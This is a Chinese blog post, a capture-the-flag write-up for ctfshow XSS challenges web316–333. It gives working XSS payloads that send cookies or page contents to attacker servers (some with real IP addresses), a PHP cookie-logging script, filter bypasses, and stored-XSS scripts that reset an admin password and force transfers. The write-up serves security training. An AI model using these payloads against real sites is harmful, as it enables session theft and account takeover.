<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="ctfshow xss"><meta name="keywords" content=""><meta name="author" content="John Doe"><meta name="copyright" content="John Doe"><title>ctfshow xss | cyxin</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.9.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"We didn't find any results for the search: ${query}"}},
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  },
  hexoVersion: '6.0.0'
} </script><meta name="generator" content="Hexo 6.0.0"></head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="Toggle article">Toggle site</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#web316"><span class="toc-number">1.</span> <span class="toc-text">web316</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web317"><span class="toc-number">2.</span> <span class="toc-text">web317</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web-318"><span class="toc-number">3.</span> <span class="toc-text">web 318</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web319"><span class="toc-number">4.</span> <span class="toc-text">web319</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web320"><span class="toc-number">5.</span> <span class="toc-text">web320</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web321"><span class="toc-number">6.</span> <span class="toc-text">web321</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web322"><span class="toc-number">7.</span> <span class="toc-text">web322</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web323"><span class="toc-number">8.</span> <span class="toc-text">web323</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web324-326"><span class="toc-number">9.</span> <span class="toc-text">web324~326</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web327"><span class="toc-number">10.</span> <span class="toc-text">web327</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web328"><span class="toc-number">11.</span> <span class="toc-text">web328</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web329"><span class="toc-number">12.</span> <span class="toc-text">web329</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web330"><span class="toc-number">13.</span> <span class="toc-text">web330</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web331"><span class="toc-number">14.</span> <span class="toc-text">web331</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web332"><span class="toc-number">15.</span> <span class="toc-text">web332</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web333"><span class="toc-number">16.</span> <span class="toc-text">web333</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/avatar.png"></div><div class="author-info__name text-center">John Doe</div><div class="author-info__description text-center"></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">Articles</span><span class="pull-right">41</span></a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://cdn.eso.org/images/screen/eso0932a.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">cyxin</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> Search</span></a></span></div><div id="post-info"><div id="post-title">ctfshow xss</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2022-02-25</time></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><p>集一下可用的姿势吧，</p>
<blockquote>
<p>window.open:open() 方法用于打开一个新的浏览器窗口或查找一个已命名的窗口。<br>location.href=”/url”当前页面打开URL页面<br>windows.location.href=”/url” 当前页面打开URL页面<br>onfocus事件在对象获得焦点时发生<br> autofocus 属性规定当页面加载时 input 元素应该自动获得焦点。</p>
</blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;window.open(<span class="string">&#x27;http://ip:端口/&#x27;</span>+document.cookie)&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">&lt;script&gt;window.location.href=<span class="string">&#x27;http://ip:端口/&#x27;</span>+document.cookie&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">&lt;script&gt;location.href=<span class="string">&#x27;http://ip:端口/&#x27;</span>+document.cookie&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">&lt;input onfocus=<span class="string">&quot;window.open(&#x27;http://ip:端口/&#x27;+document.cookie)&quot;</span> autofocus&gt;</span><br><span class="line"><span class="comment"># 通过autofocus属性执行本身的focus事件，这个向量是使焦点自动跳到输入元素上,触发焦点事件，无需用户去触发</span></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>onload 事件会在页面或图像加载完成后立即发生。</p>
<p>svg标签</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;svg onload=<span class="string">&quot;window.open(&#x27;http://ip:端口/&#x27;+document.cookie)&quot;</span>&gt;</span><br></pre></td></tr></table></figure>
<p>iframe标签</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;iframe onload=<span class="string">&quot;window.open(&#x27;http://ip:端口/&#x27;+document.cookie)&quot;</span>&gt;&lt;/iframe&gt;</span><br></pre></td></tr></table></figure>
<p>body标签</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;body onload=<span class="string">&quot;window.open(&#x27;http://ip:端口/&#x27;+document.cookie)&quot;</span>&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>img：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;</span><br><span class="line"><span class="keyword">var</span> img=document.createElement(<span class="string">&quot;img&quot;</span>); img.src=<span class="string">&quot;http://118.31.168.198:39543/&quot;</span>+document.cookie;</span><br><span class="line">&lt;/script&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>


<h2 id="web316"><a href="#web316" class="headerlink" title="web316"></a>web316</h2><p>利用自己的服务器在服务器页面上写入</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># a.php</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$cookie</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;cookie&#x27;</span>];</span><br><span class="line"><span class="variable">$log</span> = fopen(<span class="string">&quot;cookie.txt&quot;</span>, <span class="string">&quot;a&quot;</span>);</span><br><span class="line">fwrite(<span class="variable">$log</span>, <span class="variable">$cookie</span> . <span class="string">&quot;\n&quot;</span>);</span><br><span class="line">fclose(<span class="variable">$log</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>之后在题目页面写入js</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// js代码</span></span><br><span class="line">&lt;script&gt;document.location.href=<span class="string">&#x27;http://xxx/a.php?cookie=&#x27;</span>+document.cookie&lt;/script&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>之后在服务器内得到flag</p>
<h2 id="web317"><a href="#web317" class="headerlink" title="web317"></a>web317</h2><p>script标签被过滤，可以用body</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;body onload=<span class="string">&quot;window.location.href=&#x27;http://124.222.115.141/a.php?cookie=&#x27;+document.cookie&quot;</span>&gt;&lt;/body&gt;</span><br></pre></td></tr></table></figure>

<h2 id="web-318"><a href="#web-318" class="headerlink" title="web 318"></a>web 318</h2><p>过滤了img,用317得payload</p>
<h2 id="web319"><a href="#web319" class="headerlink" title="web319"></a>web319</h2><p>同上</p>
<h2 id="web320"><a href="#web320" class="headerlink" title="web320"></a>web320</h2><p>本题空格被过滤<br>利用%09得url解码进行解题</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;body	onload=<span class="string">&quot;window.location.href=&#x27;http://124.222.115.141/a.php?cookie=&#x27;+document.cookie&quot;</span>&gt;&lt;/body&gt;</span><br></pre></td></tr></table></figure>

<h2 id="web321"><a href="#web321" class="headerlink" title="web321"></a>web321</h2><p>同上</p>
<h2 id="web322"><a href="#web322" class="headerlink" title="web322"></a>web322</h2><p>又把iframe给过滤了<br>poc同上</p>
<h2 id="web323"><a href="#web323" class="headerlink" title="web323"></a>web323</h2><p>同上</p>
<h2 id="web324-326"><a href="#web324-326" class="headerlink" title="web324~326"></a>web324~326</h2><p>同上</p>
<h2 id="web327"><a href="#web327" class="headerlink" title="web327"></a>web327</h2><p>存储型XSS。首先就是poster必须是admin才能发送成功，其次就是XSS的触发点应该是sender和content都可以。直接用一下xss平台的payload就可以了。（不要用img，img似乎被过滤）<br><img src="https://img-blog.csdnimg.cn/5048b8ef24b94db991a3b4773d66cf4c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWXVuWDFu,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"></p>
<h2 id="web328"><a href="#web328" class="headerlink" title="web328"></a>web328</h2><p>看到后先注册，之后发现必须是管理员才能查看<br>于是注册时利用下面的作为密码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;window.location.href=<span class="string">&#x27;http://124.222.115.141/a.php?cookie=&#x27;</span>+document.cookie;&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<p>之后在服务器上看到管理员cookie<br>利用cookie进入管理员页面<br>之后发现会出现跳闪，利用bp抓包一步一步的放包即可得到flag</p>
<h2 id="web329"><a href="#web329" class="headerlink" title="web329"></a>web329</h2><p>方法同上，能得到cookie但是还是访问不了页面</p>
<p>原因是，管理员访问了页面就退出了，相当于现在得到的最新cookie是管理员上一次用的cookie</p>
<p>这里不行了呀这里，看了下wp是用js</p>
<p>这样，看视频<a target="_blank" rel="noopener" href="https://www.bilibili.com/video/BV1gi4y1A76p">bili</a></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;$(<span class="string">&#x27;.laytable-cell-1-0-1&#x27;</span>).each(<span class="function"><span class="keyword">function</span>(<span class="params">index,value</span>)</span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(value.innerHTML.indexOf(<span class="string">&#x27;ctf&#x27;</span>+<span class="string">&#x27;show&#123;&#x27;</span>)&gt;-<span class="number">1</span>)&#123;</span><br><span class="line">        window.location.href=<span class="string">&#x27;http://124.222.115.141/a.php?cookie=&#x27;</span>+value.innerHTML; </span><br><span class="line">    &#125;</span><br><span class="line">&#125;);&lt;/script&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>（ctfshow中间有+号，是因为防止把自己写的js给发送过去）<br>这样可以得到管理员密码<br>或者在show后加{可得到flag</p>
<h2 id="web330"><a href="#web330" class="headerlink" title="web330"></a>web330</h2><p>本题利用上一题的做法无法实现<br>经过观察，发现存在修改密码，经测试，可以发现可以修改admin的密码<br>利用</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;window.location.href=<span class="string">&#x27;http://127.0.0.1/api/change.php?p=123&#x27;</span>;&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<p>（注意要将该js放在用户名中进行利用）<br>之后登录admin得到flag</p>
<h2 id="web331"><a href="#web331" class="headerlink" title="web331"></a>web331</h2><p>本题和上一题相似<br>但本题是POST传参<br>看源码得到<br><img src="https://img-blog.csdnimg.cn/9b42d1a9da8d4df396c34684765e34c2.png" alt="在这里插入图片描述"><br>于是制作js修改管理员密码</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;$.ajax(&#123;<span class="attr">url</span>:<span class="string">&#x27;api/change.php&#x27;</span>,<span class="attr">type</span>:<span class="string">&#x27;post&#x27;</span>,<span class="attr">data</span>:&#123;<span class="attr">p</span>:<span class="string">&#x27;123&#x27;</span>&#125;&#125;);&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<p>之后登录的到flag</p>
<h2 id="web332"><a href="#web332" class="headerlink" title="web332"></a>web332</h2><p>打开题目后，发现可以买flag<br>向admin转账，-10000，发现自己账号金币有10000多可以购买flag</p>
<h2 id="web333"><a href="#web333" class="headerlink" title="web333"></a>web333</h2><p>（由于后台逻辑错误，导致转金币可以不消耗自己的金币）<br>不停给自己转金币，只要不超过自己的余额就一直转，直到得到flag</p>
<p>也可以创建一个账号，利用js漏洞让管理员给自己转金币<br>paylaod</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;$.ajax(&#123;<span class="attr">url</span>:<span class="string">&#x27;api/amount.php&#x27;</span>,<span class="attr">type</span>:<span class="string">&#x27;post&#x27;</span>,<span class="attr">data</span>:&#123;<span class="attr">u</span>:<span class="string">&#x27;111&#x27;</span>,<span class="attr">a</span>:<span class="string">&#x27;10000&#x27;</span>&#125;&#125;);&lt;/script&gt;</span><br></pre></td></tr></table></figure>




</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">John Doe</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="http://example.com/2022/02/25/ctfshow xss/">http://example.com/2022/02/25/ctfshow xss/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="post-meta__tag-list"></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2022/03/09/cve-2022-8047%20linux%E6%8F%90%E6%9D%83/"><i class="fa fa-chevron-left">  </i><span>cve-2022-8047复现</span></a></div><div class="next-post pull-right"><a href="/2022/02/19/FilesystemIterator%20%E7%B1%BB%E8%AF%BB%E7%9B%AE%E5%BD%95%E7%9A%84%E4%B8%80%E9%81%93%E5%B8%88%E5%82%85%E5%87%BA%E7%9A%84%E9%A2%98/"><span>FilesystemIterator类读目录的一道师傅出的题</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(https://cdn.eso.org/images/screen/eso0932a.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2013 - 2023 By John Doe</div><div class="framework-info"><span>Driven - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>Theme - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.9.0"></script><script src="/js/fancybox.js?version=1.9.0"></script><script src="/js/sidebar.js?version=1.9.0"></script><script src="/js/copy.js?version=1.9.0"></script><script src="/js/fireworks.js?version=1.9.0"></script><script src="/js/transition.js?version=1.9.0"></script><script src="/js/scroll.js?version=1.9.0"></script><script src="/js/head.js?version=1.9.0"></script><script src="/js/search/local-search.js"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">Local search</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="Search for Posts"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>Powered by</span> <a target="_blank" rel="noopener" href="https://github.com/wzpan/hexo-generator-search" style="color:#49B1F5;">hexo-generator-search</a></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>